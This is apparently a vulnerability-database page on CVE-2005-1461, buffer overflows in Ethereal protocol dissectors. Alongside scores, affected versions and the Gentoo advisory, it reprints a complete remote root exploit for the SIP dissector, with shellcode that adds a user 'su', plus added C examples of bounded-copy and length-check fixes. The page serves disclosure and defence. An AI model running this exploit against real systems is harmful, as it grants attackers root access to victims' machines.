CVE-2005-1461
CVSS 7.5
Published: 2005-05-05 00:00:00
Revised: 2010-08-21 00:28:54

[Original text] Multiple buffer overflows in the (1) SIP, (2) CMIP, (3) CMP, (4) CMS, (5) CRMF, (6) ESS, (7) OCSP, (8) X.509, (9) ISIS, (10) DISTCC, (11) FCELS, (12) Q.931, (13) NCP, (14) TCAP, (15) ISUP, (16) MEGACO, (17) PKIX1Explitit, (18) PKIX_Qualified, (19) Presentation dissectors in Ethereal before 0.10.11 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code.


[CNNVD] Ethereal multiple protocol dissector vulnerabilities (CNNVD-200505-929)

        Ethereal is a very popular network protocol analyzer.
        The Ethereal vendor has reported multiple vulnerabilities in various protocol dissectors, including:
         - buffer overflows
         - format string vulnerabilities
         - NULL pointer dereference denial of service
         - segmentation fault denial of service
         - infinite loops
         - memory exhaustion denial of service
         - double free
         - unspecified denial of service
        These vulnerabilities may allow a remote attacker to execute arbitrary code or crash the affected application.
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance degradation or interrupted access to resources]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:ethereal_group:ethereal:0.10.8
cpe:/a:ethereal_group:ethereal:0.9.8
cpe:/a:ethereal_group:ethereal:0.10.9
cpe:/a:ethereal_group:ethereal:0.9
cpe:/a:ethereal_group:ethereal:0.9.11
cpe:/a:ethereal_group:ethereal:0.9.16
cpe:/a:ethereal_group:ethereal:0.9.2
cpe:/a:ethereal_group:ethereal:0.9.4
cpe:/a:ethereal_group:ethereal:0.9.5
cpe:/a:ethereal_group:ethereal:0.10.10
cpe:/a:ethereal_group:ethereal:0.8.14
cpe:/a:ethereal_group:ethereal:0.10.1
cpe:/a:ethereal_group:ethereal:0.10.7
cpe:/a:ethereal_group:ethereal:0.10.2
cpe:/a:ethereal_group:ethereal:0.9.12
cpe:/a:ethereal_group:ethereal:0.8
cpe:/a:ethereal_group:ethereal:0.9.15
cpe:/a:ethereal_group:ethereal:0.9.3
cpe:/a:ethereal_group:ethereal:0.10.0
cpe:/a:ethereal_group:ethereal:0.10.4
cpe:/a:ethereal_group:ethereal:0.8.15
cpe:/a:ethereal_group:ethereal:0.10.5
cpe:/a:ethereal_group:ethereal:0.10.3
cpe:/a:ethereal_group:ethereal:0.9.7
cpe:/a:ethereal_group:ethereal:0.9.9
cpe:/a:ethereal_group:ethereal:0.9.14
cpe:/a:ethereal_group:ethereal:0.9.10
cpe:/a:ethereal_group:ethereal:0.10.6
cpe:/a:ethereal_group:ethereal:0.9.13
cpe:/a:ethereal_group:ethereal:0.8.18
cpe:/a:ethereal_group:ethereal:0.8.13
cpe:/a:ethereal_group:ethereal:0.9.1
cpe:/a:ethereal_group:ethereal:0.8.19
cpe:/a:ethereal_group:ethereal:0.9.6
cpe:/a:ethereal_group:ethereal:0.10

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9853  Multiple buffer overflows in the (1) SIP, (2) CMIP, (3) CMP, (4) CMS, (5) CRMF, (6) ESS, (7) OCSP, (8) X.509, (9) ISIS, (10) DISTCC, (11) FC...
*The OVAL definition describes in detail how to detect this vulnerability; consult the relevant OVAL definition for more technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1461
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1461
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-929
(official data source) CNNVD

- Other links and resources

http://www.ethereal.com/news/item_20050504_01.html
(UNKNOWN)  CONFIRM
http://www.ethereal.com/appnotes/enpa-sa-00019.html
(UNKNOWN)  CONFIRM
http://www.securityfocus.com/bid/13504
(UNKNOWN)  BID  13504
http://www.redhat.com/support/errata/RHSA-2005-427.html
(UNKNOWN)  REDHAT  RHSA-2005:427
http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
(UNKNOWN)  FEDORA  FLSA-2006:152922
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000963
(UNKNOWN)  CONECTIVA  CLSA-2005:963

- Vulnerability information

Ethereal multiple protocol dissector vulnerabilities
High  Buffer overflow
2005-05-05 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        The vendor has released an update that fixes this issue; download version 0.10.11 from the vendor's site:
        http://www.ethereal.com/distribution/ethereal-0.10.11.tar.gz
        http://security.gentoo.org/glsa/glsa-200505-03.xml

- Vulnerability information (1021)

Ethereal <= 0.10.10 (SIP) Protocol Dissector Remote BoF Exploit (EDBID:1021)
linux remote
2005-05-31 Verified
0 Team W00dp3ck3r
N/A [Download]
/* tethereal_sip.c (now quite functional)
*
* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
*
* Advisory: 
* http://www.ethereal.com/appnotes/enpa-sa-00019.html
* 
* produced by Team W00dp3ck3r:
* frauk\x41iser
* mag00n
* s00n
* thorben
* 
* Notes:
* tested on Debian Sarge 
* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux
*
* tested version of ethereal:
* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz
* (./configure, make, make install ;))
* 
* victim has to switch from normal user to root using "su -" 
* the exploit adds a user named "su" with password "su" on the victim host
* 
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy */
#include <unistd.h>      /* close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

unsigned char sip_header[] = 
"\x4f\x50\x54\x49\x4f\x4e\x53\x20\x73\x69\x70\x3a\x68\x61\x63"
"\x6b\x20\x53\x49\x50\x2f\x32\x2e\x30\x0a\x56\x69\x61\x3a\x20"
"\x53\x49\x50\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x63\x70\x63"
"\x31\x2d\x6d\x61\x72\x73\x31\x2d\x33\x2d\x30\x2d\x63\x75\x73"
"\x74\x32\x32\x35\x2e\x6d\x69\x64\x64\x2e\x63\x61\x62\x6c\x65"
"\x2e\x6e\x74\x6c\x2e\x63\x6f\x6d\x3a\x35\x35\x31\x31\x38\x3b"
"\x72\x70\x6f\x72\x74\x0d\x0a\x56\x69\x61\x3a\x20\x53\x49\x50"
"\x2f\x32\x2e\x30\x2f\x55\x44\x50\x20\x68\x61\x63\x6b\x3a\x39"
"\x0a\x46\x72\x6f\x6d\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b"
"\x3b\x74\x61\x67\x3d\x36\x31\x35\x61\x65\x37\x37\x30\x0a\x54"
"\x6f\x3a\x20\x73\x69\x70\x3a\x68\x61\x63\x6b";

unsigned char callid[] =
"\x0a\x43\x61\x6c\x6c\x2d\x49\x44\x3a\x20";


/* adduser shellcode, user: "su", pwd: "su" Full Size=116, split into 
2 parts because one buffer was too small. thx to http://metasploit.com */
unsigned char shellcode[] =
"\x31\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa5"
"\xb7\x95\xbb\x83\xeb\xfc\xe2\xf4\x94\x7e\x1c\x70\xcf\xf1\xcd\x76"
"\x25\xdd\x90\xe3\x94\x7e\xc4\xd3\xd6\xc4\xe2\xdf\xcd\x98\xba\xcb"
"\xc4\xdf\xba\xde\xd1\xd4\x1c\x58\xe4\x02\x91\x76\x25\x24\x7d\x9b"
"\xa5\xb7\x95\xc8\xd0\x8d\xd4\xfa\xdf\xf2\xac\xd4\xd4\xf9\xdd\xed"
"\xf5\x82\xe6\x81\x95\x8d\xa5\x81\x9f\x98\xaf\x94\xc7\xde\xfb\x94"
"\xd6\xdf\x9f\xe2\x2e\xe6";


unsigned char cseq[] = 
"\x0a\x43\x53\x65\x71\x3a\x20";

/* the malformed cseq method field. the buffer has a size of 16 byte. you need 
48 byte to overwrite the return address. the first byte is checked isalpha(), 
so we split the shellcode in a way that the first char of cseq_method passes
the isalpha() check. */ 
unsigned char cseq_method[] = 
"\x69\xd1\xa1\xef\x58\x3b\xcf\xb6\xcd\x76\x25\xb7\x95\xbb";


/* needed to be a fully valid sip packet */
unsigned char sip_footer[] =
"\x0a\x43\x6f\x6e\x74\x61\x63\x74\x3a\x20\x68\x61\x63\x6b\x3a"
"\x39\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74"
"\x68\x3a\x20\x30\x0a\x4d\x61\x78\x2d\x46\x6f\x72\x77\x61\x72"
"\x64\x73\x3a\x20\x37\x30\x0a\x55\x73\x65\x72\x2d\x41\x67\x65"
"\x6e\x74\x3a\x20\x57\x30\x30\x64\x70\x33\x63\x6b\x33\x72\x20"
"\x0a";



int main(int argc, char * argv[]) {
unsigned int i, offset, ret, p_addr;
struct sockaddr_in dest;
struct hostent *he;
int sock, slen = sizeof(struct sockaddr);
unsigned char buffer[2048];

// help output
if(argc < 3) {
printf("correct syntax: %s <flag> <host> \n", argv[0]);
printf("possible flag: \n");
printf("1 the ethereal user has started tethereal " 
"with full path as root \n");
printf("2 the ethereal user has started tethereal " 
"without directory path as root \n");
return 1;
}

// p_addr may differ on other systems ;)
if (argv[1][0] == '1') {
p_addr = 0xbffee328;
} else if (argv[1][0] == '2') {
p_addr = 0xbffee338;
} else {
// unknown flag: p_addr would otherwise be used uninitialised below
printf("[!] unknown flag %s, use 1 or 2\n", argv[1]);
return 1;
}

// destination-ip check
if((he = gethostbyname(argv[2])) == NULL) {
printf("[!] Couldn't resolve %s\n", argv[2]);
return 1;
}

// open socket
if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("socket()");
return 1;
}

// set packet parameters (zero the struct first so sin_zero/padding is clean)
memset(&dest, 0, sizeof(dest));
dest.sin_port = htons(5060);
dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)he->h_addr);

// set the returnaddress (may differ on other systems)
ret = 0xbffee240; 


//// generate a buffer containing the data ////
offset = 0;

// set all values of the buffer to 0x0
memset(buffer, 0x0, sizeof(buffer));

// copy the header into the buffer
memcpy(buffer+offset, sip_header, sizeof(sip_header)); 
offset += sizeof(sip_header) -1;

// concat the callid into the buffer
memcpy(buffer+offset, callid, sizeof(callid)); 
offset += sizeof(callid) -1;

// add the callid-value (nop+shellcode)
i = 128 - sizeof(shellcode) +1; 
memset(buffer+offset, 0x90, i);
offset += i;

// insert shellcode into buffer
memcpy(buffer+offset, shellcode, sizeof(shellcode));
offset += sizeof(shellcode) -1; 


// concat the cseq
memcpy(buffer+offset, cseq, sizeof(cseq)); 
offset += sizeof(cseq) -1;

// generate the part, which causes the overflow (=cseq-method)
memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 
offset += sizeof(cseq_method) -1; 

// fill the rest of cseq_method with A
memset(buffer+offset, 0x41, 30);
offset += 30; 
// write return address
*(long *)&buffer[offset] = ret; 
offset += 4;

// repair the first pointer after ret- address
*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1
offset += 4;
// repair second pointer after ret- address 
*(long *)&buffer[offset] = p_addr;
offset += 4; 

// the finalising part of the message
memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 

// send the buffer to the victim
if (sendto(sock, buffer, sizeof(buffer), 0, 
(struct sockaddr *)&dest, slen)== -1) {
printf("[!] Error sending packet!\n");
return 1;
}

// DEBUG //
// printf("%s\n", buffer);

printf("[*] dark W00dp3ck3r packet sent!\n");
close(sock);
return 0;

}

// milw0rm.com [2005-05-31]
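The exploit's comments describe the bug shape: the dissector copies the CSeq method token into a 16-byte buffer after checking only that its first byte is alphabetic, so a 48-byte method reaches the saved return address. The following C program is an added illustration of that pattern beside the bounded copy that fixes it; it is not Ethereal's packet-sip.c and not the exploit authors' code. The 16-byte buffer size and the isalpha() check are taken from the comments above; the SIP header-walking helper, the function names and the two sample messages are assumptions constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Buffer size the exploit's comments attribute to the CSeq method field
 * (assumption: a fixed-size stack buffer in the dissector). */
#define CSEQ_METHOD_BUF 16

/* Constructed sample messages, not captured traffic. */
static const char BENIGN_MSG[] =
    "OPTIONS sip:hack SIP/2.0\r\n"
    "Via: SIP/2.0/UDP hack:9\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "Content-Length: 0\r\n\r\n";

/* 48-byte method, the length the exploit says reaches the return address. */
static const char LONG_CSEQ_MSG[] =
    "OPTIONS sip:hack SIP/2.0\r\n"
    "Via: SIP/2.0/UDP hack:9\r\n"
    "CSeq: 1 " "AAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAA" "\r\n"
    "Content-Length: 0\r\n\r\n";

/* Case-insensitive test for "CSeq:" at p (SIP header names are case-insensitive). */
static int starts_with_cseq(const char *p)
{
    static const char name[] = "cseq:";
    size_t i;
    for (i = 0; i < 5; i++)
        if (p[i] == '\0' || tolower((unsigned char)p[i]) != name[i]) return 0;
    return 1;
}

/* Find the CSeq header at the start of a line, skip the sequence number and
 * return the length of the method token (up to CR/LF/NUL), storing its start
 * in *method_out. Returns 0 when there is no CSeq header or no method. */
size_t find_cseq_method(const char *msg, const char **method_out)
{
    const char *p;
    for (p = msg; *p; p++) {
        if ((p == msg || p[-1] == '\n') && starts_with_cseq(p)) {
            const char *start;
            p += 5;
            while (*p == ' ' || *p == '\t') p++;
            while (isdigit((unsigned char)*p)) p++;      /* sequence number */
            while (*p == ' ' || *p == '\t') p++;
            start = p;
            while (*p && *p != '\r' && *p != '\n') p++;
            if (method_out) *method_out = start;
            return (size_t)(p - start);
        }
    }
    if (method_out) *method_out = NULL;
    return 0;
}

/* Vulnerable pattern as the exploit comments describe it: an unbounded copy of
 * the method into char buf[CSEQ_METHOD_BUF] guarded only by isalpha() on the
 * first byte. Returns 1 if that copy would run past the buffer, 0 otherwise;
 * the copy itself is deliberately not performed. */
int cseq_method_overflows(const char *msg)
{
    const char *m;
    size_t n = find_cseq_method(msg, &m);
    if (n == 0 || !isalpha((unsigned char)m[0]))
        return 0;                          /* rejected before the copy */
    return (n + 1 > CSEQ_METHOD_BUF) ? 1 : 0;   /* n bytes plus the NUL */
}

/* Hardened pattern: bounded copy that truncates instead of overflowing.
 * Returns the number of bytes stored (excluding the terminating NUL). */
size_t cseq_method_copy_safe(const char *msg, char *buf, size_t buflen)
{
    const char *m;
    size_t n;
    if (buflen == 0) return 0;
    n = find_cseq_method(msg, &m);
    if (n == 0 || !isalpha((unsigned char)m[0])) { buf[0] = '\0'; return 0; }
    if (n > buflen - 1) n = buflen - 1;    /* truncate, never overrun */
    memcpy(buf, m, n);
    buf[n] = '\0';
    return n;
}

/* Run the hardened copy into a CSEQ_METHOD_BUF-sized local buffer and
 * report how many bytes it kept. */
size_t cseq_method_safe_len(const char *msg)
{
    char buf[CSEQ_METHOD_BUF];
    return cseq_method_copy_safe(msg, buf, sizeof buf);
}

int main(void)
{
    printf("benign: method %zu bytes, overflows=%d\n",
           find_cseq_method(BENIGN_MSG, NULL), cseq_method_overflows(BENIGN_MSG));
    printf("long:   method %zu bytes, overflows=%d, safely stored=%zu\n",
           find_cseq_method(LONG_CSEQ_MSG, NULL), cseq_method_overflows(LONG_CSEQ_MSG),
           cseq_method_safe_len(LONG_CSEQ_MSG));
    return 0;
}
```

The isalpha() guard is preserved in both variants because it is the only thing the original check enforced; note that it does nothing against length, which is why the exploit only has to make the first byte of its payload a letter.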
		

- 漏洞信息 (F38410)

Gentoo Linux Security Advisory 200505-3 (PacketStormID:F38410)
2005-07-02 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2005-1456,CVE-2005-1457,CVE-2005-1458,CVE-2005-1459,CVE-2005-1460,CVE-2005-1461,CVE-2005-1462,CVE-2005-1463,CVE-2005-1464,CVE-2005-1465,CVE-2005-1466,CVE-2005-1467,CVE-2005-1468,CVE-2005-1469,CVE-2005-1470
[Download]

Gentoo Linux Security Advisory GLSA 200505-03 - Ethereal is vulnerable to numerous vulnerabilities potentially resulting in the execution of arbitrary code or abnormal termination. Versions less than 0.10.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200505-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Ethereal: Numerous vulnerabilities
      Date: May 06, 2005
      Bugs: #90539
        ID: 200505-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Ethereal is vulnerable to numerous vulnerabilities potentially
resulting in the execution of arbitrary code or abnormal termination.

Background
==========

Ethereal is a feature rich network protocol analyzer.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/ethereal      < 0.10.11                   >= 0.10.11

Description
===========

There are numerous vulnerabilities in versions of Ethereal prior to
0.10.11, including:

* The ANSI A and DHCP dissectors are vulnerable to format string
  vulnerabilities.

* The DISTCC, FCELS, SIP, ISIS, CMIP, CMP, CMS, CRMF, ESS, OCSP,
  PKIX1Explicit, PKIX Qualified, X.509, Q.931, MEGACO, NCP, ISUP, TCAP
  and Presentation dissectors are vulnerable to buffer overflows.

* The KINK, WSP, SMB Mailslot, H.245, MGCP, Q.931, RPC, GSM and SMB
  NETLOGON dissectors are vulnerable to pointer handling errors.

* The LMP, KINK, MGCP, RSVP, SRVLOC, EIGRP, MEGACO, DLSw, NCP and
  L2TP dissectors are vulnerable to looping problems.

* The Telnet and DHCP dissectors could abort.

* The TZSP, Bittorrent, SMB, MGCP and ISUP dissectors could cause a
  segmentation fault.

* The WSP, 802.3 Slow protocols, BER, SMB Mailslot, SMB, NDPS, IAX2,
  RADIUS, SMB PIPE, MRDISC and TCAP dissectors could throw assertions.

* The DICOM, NDPS and ICEP dissectors are vulnerable to memory
  handling errors.

* The GSM MAP, AIM, Fibre Channel, SRVLOC, NDPS, LDAP and NTLMSSP
  dissectors could terminate abnormally.

Impact
======

An attacker might be able to use these vulnerabilities to crash
Ethereal and execute arbitrary code with the permissions of the user
running Ethereal, which could be the root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Ethereal users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/ethereal-0.10.11"

References
==========

  [ 1 ] Ethereal enpa-sa-00019
        http://www.ethereal.com/appnotes/enpa-sa-00019.html
  [ 2 ] CAN-2005-1456
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1456
  [ 3 ] CAN-2005-1457
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1457
  [ 4 ] CAN-2005-1458
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1458
  [ 5 ] CAN-2005-1459
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1459
  [ 6 ] CAN-2005-1460
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1460
  [ 7 ] CAN-2005-1461
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1461
  [ 8 ] CAN-2005-1462
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1462
  [ 9 ] CAN-2005-1463
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1463
  [ 10 ] CAN-2005-1464
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1464
  [ 11 ] CAN-2005-1465
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1465
  [ 12 ] CAN-2005-1466
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1466
  [ 13 ] CAN-2005-1467
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1467
  [ 14 ] CAN-2005-1468
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1468
  [ 15 ] CAN-2005-1469
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1469
  [ 16 ] CAN-2005-1470
         http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1470

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200505-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- Vulnerability information

16097
Ethereal DISTCC Dissector Multiple Message Type Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

A remote overflow exists in Ethereal. The DISTCC dissector fails to validate argv, serr and sout messages resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.
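The entry above says the DISTCC dissector did not validate the ARGV, SERR and SOUT messages. In the distcc wire protocol each message is a four-letter token followed by eight hex digits, and for the payload-carrying tokens those digits declare the length of the bytes that follow; a dissector that uses that length as a read or copy size without first comparing it against the bytes remaining in the packet walks off the end of its buffer. The walker below is an added example of that check, written for this page: it is not Ethereal's packet-distcc.c, the token framing is the author's understanding of distcc protocol v1 (ARGV, DOTI, SERR, SOUT and DOTO carry payloads; DIST, ARGC, DONE and STAT carry values), and the function names and the sample messages are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Tokens followed by a payload of the declared length (assumption: distcc v1
 * framing). Every other token carries its value in the 8 hex digits. */
static const char *const PAYLOAD_TOKENS[] = { "ARGV", "DOTI", "SERR", "SOUT", "DOTO" };

static int has_payload(const unsigned char *name)
{
    size_t i;
    for (i = 0; i < sizeof PAYLOAD_TOKENS / sizeof PAYLOAD_TOKENS[0]; i++)
        if (memcmp(name, PAYLOAD_TOKENS[i], 4) == 0) return 1;
    return 0;
}

/* Parse exactly 8 hex digits at p; 0 on success, -1 on a non-hex byte. */
static int parse_hex8(const unsigned char *p, uint32_t *out)
{
    uint32_t v = 0;
    int i;
    for (i = 0; i < 8; i++) {
        unsigned char c = p[i];
        int d;
        if (c >= '0' && c <= '9') d = c - '0';
        else if (c >= 'a' && c <= 'f') d = c - 'a' + 10;
        else if (c >= 'A' && c <= 'F') d = c - 'A' + 10;
        else return -1;
        v = (v << 4) | (uint32_t)d;
    }
    *out = v;
    return 0;
}

/* Walk the tokens in buf[0..len). Returns the token count on success, or -1
 * when a token header is truncated, its digits are not hex, or a payload
 * token declares more bytes than remain (the check the OSVDB entry says was
 * missing). On failure *bad_index, if non-NULL, gets the offending token's
 * zero-based index. */
int distcc_walk(const unsigned char *buf, size_t len, int *bad_index)
{
    size_t off = 0;
    int count = 0;
    while (off < len) {
        const unsigned char *name = buf + off;
        uint32_t val;
        if (len - off < 12 || parse_hex8(name + 4, &val) != 0) {
            if (bad_index) *bad_index = count;
            return -1;
        }
        off += 12;
        if (has_payload(name)) {
            if (val > len - off) {       /* declared length exceeds the packet */
                if (bad_index) *bad_index = count;
                return -1;
            }
            off += val;                  /* safe only after the check above */
        }
        count++;
    }
    return count;
}

/* Constructed samples, not captured traffic. */
static const char GOOD_REQ[] =
    "DIST00000001" "ARGC00000003"
    "ARGV00000003" "gcc" "ARGV00000002" "-c" "ARGV00000005" "foo.c"
    "DOTI00000000";
static const char GOOD_RESP[] =
    "DONE00000001" "STAT00000000" "SERR00000005" "error" "SOUT00000000" "DOTO00000000";
/* Declares 0xFFFF bytes of ARGV payload while only 3 follow. */
static const char BAD_REQ[] =
    "DIST00000001" "ARGC00000001" "ARGV0000FFFF" "gcc";

int distcc_count_tokens(const char *s)
{
    return distcc_walk((const unsigned char *)s, strlen(s), NULL);
}

/* Index of the first malformed token, or -1 if the message is well-formed. */
int distcc_first_bad_token(const char *s)
{
    int bad = -1;
    if (distcc_walk((const unsigned char *)s, strlen(s), &bad) < 0) return bad;
    return -1;
}

int main(void)
{
    printf("good request: %d tokens\n", distcc_count_tokens(GOOD_REQ));
    printf("bad request:  first bad token index %d\n", distcc_first_bad_token(BAD_REQ));
    return 0;
}
```

The important comparison is `val > len - off` performed before `off += val`: with a 32-bit length field the attacker controls up to 4 GiB of "declared" payload, so the remaining-bytes check must happen on every payload token, not just the first.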

- Timeline

2005-05-04 Unknown
Unknown Unknown

- Solution

Upgrade to version 0.10.11 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

 

 

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites.